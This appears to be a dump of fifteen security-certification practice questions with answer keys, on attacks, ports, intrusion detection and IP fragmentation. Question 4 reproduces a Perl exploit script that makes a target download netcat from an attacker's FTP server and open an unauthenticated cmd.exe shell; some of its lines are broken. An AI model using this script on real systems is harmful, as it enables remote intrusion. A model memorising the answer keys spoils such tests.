NEW QUESTION 1
Which of the following DoS attacks points the Central Processing Unit (CPU) to a non-existent memory location causing the running process to end abruptly?

• A. Buffer Overflow attack
• B. Teardrop attack
• C. Fraggle attack
• D. Snork attack

Answer: A

NEW QUESTION 2
Peter, a malicious hacker, obtains e-mail addresses by harvesting them from postings, blogs, DNS listings, and Web pages. He then sends large number of unsolicited commercial e-mail (UCE) messages on these addresses. Which of the following e-mail crimes is Peter committing?

• A. E-mail spoofing
• B. E-mail bombing
• C. E-mail Storm
• D. E-mail Spam

Answer: D

NEW QUESTION 3
Choose the proper transport protocol and port number used for Domain Name System. You should be concerned only with DNS lookups.

• A. tcp, port 53
• B. udp, port 53
• C. tcp, port 67
• D. udp, port 67

Answer: B

NEW QUESTION 4
Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl
msadc.pl -h
$host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system
("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo
bin>>sasfile\"");
system("perl
msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo get
hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server
is
downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download
is
finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

• A. Opens up a SMTP server that requires no username or password
• B. Creates a share called "sasfile" on the target system
• C. Creates an FTP server with write permissions enabled
• D. Opens up a telnet listener that requires no username or password

Answer: D

NEW QUESTION 5
Which of the following tools is used to analyze the files produced by several popular packetcapture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?

• A. Fpipe
• B. tcptraceroute
• C. Sniffer
• D. tcptrace

Answer: D

NEW QUESTION 6
Which of the following ports is used by e-mail clients to send request to connect to the server?

• A. Port 23
• B. Port 21
• C. Port 25
• D. Port 20

Answer: C

NEW QUESTION 7
Which of the following techniques allows probing firewall rule-sets and finding entry points into the targeted system or network?

• A. Network enumerating
• B. Packet collision
• C. Distributed Checksum Clearinghouse
• D. Packet crafting

Answer: D

NEW QUESTION 8
Which of the following Web attacks is performed by manipulating codes of programming languages such as SQL, Perl, Java present in the Web pages?

• A. Command injection attack
• B. Code injection attack
• C. Cross-Site Request Forgery
• D. Cross-Site Scripting attack

Answer: B

NEW QUESTION 9
John works as a Network Security Administrator for NetPerfect Inc. The manager of the company has told John that the company's phone bill has increased drastically. John suspects that the company's phone system has been cracked by a malicious hacker. Which attack is used by malicious hackers to crack the phone system?

• A. War dialing
• B. Sequence++ attack
• C. Phreaking
• D. Man-in-the-middle attack

Answer: C

NEW QUESTION 10
Which of the following organizations is dedicated to computer security research and information sharing?

• A. FBI
• B. NIPC
• C. Honeynet Project
• D. IEEE

Answer: C

NEW QUESTION 11
What is the process of detecting unauthorized access known as?

• A. Intrusion detection
• B. Misuse detection
• C. Anomaly detection
• D. Integrity detection

Answer: A

NEW QUESTION 12
You work as a network administrator for Tech Perfect Inc. Rick, your assistant, requires information regarding his computer's IP address lease start date and expiry date. Which of the following commands will help him?

• A. Ipconfig /all
• B. Ping 127.0.0.1
• C. Ping /t
• D. Ipconfig /renew

Answer: A

NEW QUESTION 13
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He wants to send malicious data packets in such a manner that one packet fragment overlaps data from a previous fragment so that he can perform IDS evasion on the We-are-secure server and execute malicious data. Which of the following tools can he use to accomplish the task?

• A. Hunt
• B. Alchemy Remote Executor
• C. Mendax
• D. Ettercap

Answer: C

NEW QUESTION 14
Which of the following information must the fragments carry for the destination host to reassemble them back to the original unfragmented state?
Each correct answer represents a complete solution. Choose all that apply.

• A. MF flag
• B. Offset field
• C. MAC address
• D. Length of the data
• E. IP address
• F. IP identification number

Answer: ABDF

NEW QUESTION 15
Which of the following statements are true about an IPv6 network?
Each correct answer represents a complete solution. Choose all that apply.

• A. For interoperability, IPv4 addresses use the last 32 bits of IPv6 addresse
• B. It increases the number of available IP addresse
• C. It provides improved authentication and securit
• D. It uses 128-bit addresse
• E. It uses longer subnet masks than those used in IPv4.

Answer: ABCD

NEW QUESTION 16
......